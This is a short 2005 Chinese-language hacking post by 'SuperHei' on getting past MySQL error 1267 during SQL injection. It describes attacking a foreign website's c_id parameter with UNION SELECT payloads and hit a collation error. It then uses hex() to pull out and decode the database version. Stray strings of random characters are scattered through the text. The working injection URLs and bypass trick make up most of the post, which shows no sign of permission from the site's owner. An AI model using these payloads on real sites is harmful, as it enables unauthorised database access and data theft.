MySQL注射时ErrorNo.1267的突破

admin

本文作者：SuperHei
$ \6 ?, \  P% N+ \文章性质：原创
发布日期：2005-10-18
) L5 z. n' x* u4 R1 C  x. _1 |测试个国外的站时：
url：?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
返回错误：
) E3 m' i- w1 r! A$ w( U5 j3 @$ BIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
. a. b( N# z) R" ^! XMySQL Error No. 126
3 ^! M* g+ E. ~; M/ b& I- V0 R看来是union查询前后字符集（http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html）不同出现的。
) ^$ `) v. l5 C' M0 `解决办法：转为其他编码如hex。
4 T. ]! p. g+ k7 ?. k- o' q! wurl：?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
' f+ p- S8 I7 c" H( `成功得到hex(version())的值为：
342E312E332D62657461
回Mysql查询下得到：
mysql> select 0x342E312E332D62657461;
! \' b6 \5 R$ t; ^( Q  {+------------------------+
| 0x342E312E332D62657461 |
+------------------------+
| 4.1.3-beta |
+------------------------+
1 row in set (0.00 sec)

8 t! c) O) {, C# o! h